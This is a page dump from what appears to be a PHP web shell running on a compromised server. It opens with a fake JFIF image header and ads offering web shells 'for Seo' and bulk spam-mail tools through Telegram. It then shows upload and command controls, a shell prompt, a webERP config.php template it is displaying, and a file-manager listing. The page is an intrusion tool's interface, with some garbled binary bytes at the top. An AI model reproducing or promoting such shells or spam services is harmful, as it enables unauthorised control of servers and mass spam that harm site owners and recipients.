����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

infinityocean@216.73.216.250: ~ $
<?php

// User configurable variables
//---------------------------------------------------

// Default language to use for the login screen and the setup of new users.
// The users' language selection will override this
$DefaultLanguage = '[[language]]';

// Default theme to use for the login screen and the setup of new users.
// The users' theme selection will override this
//$DefaultTheme = 'professional';
//$DefaultTheme = 'wood';
//$DefaultTheme = 'silverwolf';
//$DefaultTheme = 'gel';
$DefaultTheme = 'xenos';

// Whether to display the demo login and password or not on the login screen
$AllowDemoMode = false;

// Whether to display company logo in drop down list at login
$ShowLogoAtLogin = true;

// Email address of the system administrator
$SysAdminEmail = '[[admin_email]]';

// The timezone of the business - this allows the possibility of having
// the web-server in a different timezone than the business but in general
// should always be set correctly
//date_default_timezone_set('Europe/London');
//date_default_timezone_set('America/Los_Angeles');
//date_default_timezone_set('Asia/Shanghai');
//date_default_timezone_set('Australia/Melbourne');
//date_default_timezone_set('Australia/Sydney');
date_default_timezone_set('America/New_York');

// Connection information for the database
//
// $Host is the computer ip address or name where the database is located
// If the web server is also the database server then use 'localhost' or '127.0.0.1'
$Host = '[[softdbhost]]';
$DBPort = '3306';
// The type of db server being used
//$DBType = 'mysqli'; // use for mysql server
//$DBType = 'mariadb';
//$DBType = 'postgres'; // UNSUPPORTED
$DBType = 'mysqli';

// Database user & password
$DBUser = '[[softdbuser]]';
$DBPassword = '[[softdbpass]]';

// The DB character set.
// For mysql/mariadb, utf8mb4 is preferred. If your database version does not support it, you can, depending on the
// specific version, use the 'utf8' alias for 'utf8mb3'
$DBCharset = 'utf8mb4';

// Login company selection
//
// If allowing selection of the company in the login window is not desired (e.g. in a hosted environment and seeing other
// users would be distracting, create confusion or violate privacy expectations), change this option to 'ShowInputBox'
// to have the user enter the company name, or 'Hide' to force using $DefaultCompany.
//
// If set to 'ShowSelectionBox', webERP examines each sub-directory in companies/ to determine all the companies
// that can be logged into.
//$AllowCompanySelectionBox = 'Hide';
//$AllowCompanySelectionBox = 'ShowInputBox';
$AllowCompanySelectionBox = 'ShowSelectionBox';

// If $AllowCompanySelectionBox is not 'ShowSelectionBox' use $DefaultDatabase as the default Company (will be
// default in the login screen, otherwise the user must know the name of the company to log into).
$DefaultDatabase = '[[softdb]]';

// The maximum time that a login session can be idle before automatic logout.
// Currently only used for the API and for users for which the timeout is not defined in their personal settings.
// Time is in seconds. 3600 seconds in an hour
$SessionLifeTime = 3600;

// The maximum time that a script can execute for before the web-server should terminate it.
// Time is in seconds
$MaximumExecutionTime = 120;

// Setting to 12 or 24 determines the format of the clock display at the end of all screens
$DefaultClock = 12;
//$DefaultClock = 24;

// Path to session files on server
//
// This can be useful for multi-host web servers where pages are serviced using load balancing servers, otherwise
// the session can be lost when the load balancer picks a different server. To prevent that, this option tells the
// server explicitly where to find the session files (which should be on a shared-access filesystem in that scenario).
//
// This option is also useful when a server has multiple webERP installs (e.g. to serve multiple webERP sites using
// customized or different releases of code) and those can be accessed by the same client browser (e.g. by a user of
// both webERP sites, or a common administrator of them). The solution is to specify different $SessionSavePath in
// each installation's config.php
//
// If there is only one installation of webERP on the web-server - which can be used with many company databases (and
// there is no load balancing difficulties to circumvent), this can be left commented.
//
// Note that it is also possible to configure PHP to store sessions in database-like services, such as redis or memcached.
// In that case, this setting won't have any effect.
//
//$SessionSavePath = '/tmp';

// Set a specific session_name to avoid potential default session_name conflicts
// with other apps using the same host.
$SessionName = 'PHPSESSIDwebERPteam';

// $RootPath is used in most scripts to build links to assets and other scripts.
// It is the path to the webERP directory as "seen" from the user's browser (excluding the hostname and port).
// NOTE: In some windows installations, or when the web server sits behind a reverse proxy, the default, calculated value
// doesn't work and the administrator must set this to a fixed path manually.
// NOTE: no trailing slashes are necessary.
// E.g. if the files are under the webserver root directory
//$RootPath = '';
// E.g. 2 if the files are in the webERP folder inside the webserver root directory, then webERP is the rootpath
//$RootPath = 'webERP';
$RootPath = htmlspecialchars(dirname($_SERVER['PHP_SELF']), ENT_QUOTES, 'UTF-8');

// Report all errors except E_NOTICE
// (default value in php.ini for most installations, but it is forced here to be sure)
// Note: turning on NOTICES will destroy things
error_reporting(E_ALL && ~E_NOTICE);
// For Development, use:
//error_reporting(-1);

// Debug information
$Debug = 0; // No debug information will be shown. Recommended for production environments
// $Debug = 1; // Simple debug information will be shown. Recommended for development environments
// $Debug = 2; // Detailed debug information will be shown. Recommended for development environments

// The real path to the symlinked part_pics directory, to prevent DomPDF from being unable to access images
$SymlinkImageDir = ''; // if no symlink is used.
// $SymlinkImageDir = '/var/www/vhosts/mydomain.com/dir/where/actually/images/are/stored'; // if symlink is used.

// Installed companies
// - see companies/dbname/Companies.php

// END OF USER CONFIGURABLE VARIABLES

if (isset($DirectoryLevelsDeep)) {
	for ($i = 0; $i < $DirectoryLevelsDeep; $i++) {
		$RootPath = mb_substr($RootPath, 0, strrpos($RootPath,'/'));
	}
}

if ($RootPath === '/' or $RootPath === '\\') {
	$RootPath = '';
}

Filemanager

Name Type Size Permission Actions
images Folder 0755
php53 Folder 0755
php56 Folder 0755
php71 Folder 0755
php81 Folder 0755
php82 Folder 0755
Companies.php File 53 B 0644
_clone.php File 1.96 KB 0644
_edit.php File 3.61 KB 0644
_edit.xml File 433 B 0644
config.php File 6.51 KB 0644
extend.php File 9.07 KB 0644
fileindex.php File 9.28 KB 0644
import.php File 3.49 KB 0644
info.xml File 4.06 KB 0644
install.js File 924 B 0644
install.php File 4.51 KB 0644
install.xml File 2.77 KB 0644
md5 File 2.21 KB 0644
notes.txt File 1.41 KB 0644
update_pass.php File 497 B 0644
upgrade.php File 4.32 KB 0644
upgrade.xml File 670 B 0644
weberp.sql File 472.98 KB 0644
weberp.zip File 66.33 MB 0644